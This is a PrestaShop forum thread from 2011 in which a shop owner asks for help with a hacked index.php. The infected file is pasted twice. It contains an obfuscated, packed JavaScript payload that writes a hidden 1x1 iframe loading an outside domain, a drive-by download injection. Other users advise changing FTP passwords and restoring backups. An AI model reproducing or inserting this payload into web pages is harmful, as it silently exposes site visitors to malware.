TopScript Posted June 13, 2011 Share Posted June 13, 2011 My website crashed 3 times in 2 days...and i keep uploading backups..I got this error on my page:Parse error: syntax error, unexpected '<' in /home/wayfrien/public_html/tapet-delux.ro/index.php on line 30The index.php file is encoded, but when i try to download it from my host, i get this message from my antivirus system:JS/TrojanDownloader.Iframe.NIE trojan.and is submitted to quarantine automaticly.here is the website:http://www.tapet-delux.roCan anyone advice in this matter?..I use prestashop 1.4.1Regards and waiting for some advices.. Link to comment Share on other sites More sharing options...
TopScript Posted June 13, 2011 Author Share Posted June 13, 2011 is weird that the actual file now it looks like this...on my host: <?php /* * 2007-2011 PrestaShop * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/osl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to [email protected] so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to http://www.prestashop.com for more information. * * @author PrestaShop SA * @copyright 2007-2011 PrestaShop SA * @version Release: $Revision: 1.4 $ * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0) * International Registered Trademark & Property of PrestaShop SA */ require(dirname(__FILE__).'/config/config.inc.php'); ControllerFactory::getController('IndexController')->run(); [removed]eval(unescape('eval(function(aU,uvb,TOh,cqQ,EhC,AM){EhC=String;if(!''.replace(/^/,String)){while(TOh--)AM[TOh]=cqQ[TOh]||TOh;cqQ=[function(EhC){return AM[EhC]}];EhC=function(){return'\w+'};TOh=1};while(TOh--)if(cqQ[TOh])aU=aU.replace(new RegExp('\b'+EhC(TOh)+'\b','g'),cqQ[TOh]);return aU}('5.2("<8 7=\"6://4.0/\" 3=1 9=1>");',10,10,'com||write|width|besloqawe|document|http|src|iframe|height'.split('|'),0,{}))'));[removed]<!-- uy7gdr5kmn --> and the one from my backup it looks something like this: <?php /* * 2007-2011 PrestaShop * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/osl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to [email protected] so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to http://www.prestashop.com for more information. * * @author PrestaShop SA * @copyright 2007-2011 PrestaShop SA * @version Release: $Revision: 1.4 $ * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0) * International Registered Trademark & Property of PrestaShop SA */ require(dirname(__FILE__).'/config/config.inc.php'); ControllerFactory::getController('IndexController')->run(); why is that?regards. Link to comment Share on other sites More sharing options...
koconborz Posted June 13, 2011 Share Posted June 13, 2011 is weird that the actual file now it looks like this...on my host:<?php /* * 2007-2011 PrestaShop * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/osl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to [email protected] so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to http://www.prestashop.com for more information. * * @author PrestaShop SA * @copyright 2007-2011 PrestaShop SA * @version Release: $Revision: 1.4 $ * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0) * International Registered Trademark & Property of PrestaShop SA */ require(dirname(__FILE__).'/config/config.inc.php'); ControllerFactory::getController('IndexController')->run(); [removed]eval(unescape('eval(function(aU,uvb,TOh,cqQ,EhC,AM){EhC=String;if(!''.replace(/^/,String)){while(TOh--)AM[TOh]=cqQ[TOh]||TOh;cqQ=[function(EhC){return AM[EhC]}];EhC=function(){return'\w+'};TOh=1};while(TOh--)if(cqQ[TOh])aU=aU.replace(new RegExp('\b'+EhC(TOh)+'\b','g'),cqQ[TOh]);return aU}('5.2("<8 7=\"6://4.0/\" 3=1 9=1>");',10,10,'com||write|width|besloqawe|document|http|src|iframe|height'.split('|'),0,{}))'));[removed]<!-- uy7gdr5kmn --> and the one from my backup it looks something like this: <?php /* * 2007-2011 PrestaShop * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/osl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to [email protected] so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to http://www.prestashop.com for more information. * * @author PrestaShop SA * @copyright 2007-2011 PrestaShop SA * @version Release: $Revision: 1.4 $ * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0) * International Registered Trademark & Property of PrestaShop SA */ require(dirname(__FILE__).'/config/config.inc.php'); ControllerFactory::getController('IndexController')->run(); why is that?regards. Yeah, it seems you got a virus. I had the same about a year ago. I think it was a virus which uses the TotalCommander's ftp accesses. That's why the TC team built a masterkey feature into the ftp manager. If it's possible change your ftp and database password and make it empty from the TotalCommander.The virus usually infects the html, php and js files, so if you can, restore your backup and everything will be fine. Check your database, sometimes they put the code into it too. Link to comment Share on other sites More sharing options...
TopScript Posted June 13, 2011 Author Share Posted June 13, 2011 how do i search it id database? Link to comment Share on other sites More sharing options...
Patric Posted June 13, 2011 Share Posted June 13, 2011 Hi,The PrestaShop script does not contain any virus.You should change your FTP password to avoid this to happen again.I changed the topic's title into something less frightening. Link to comment Share on other sites More sharing options...
Recommended Posts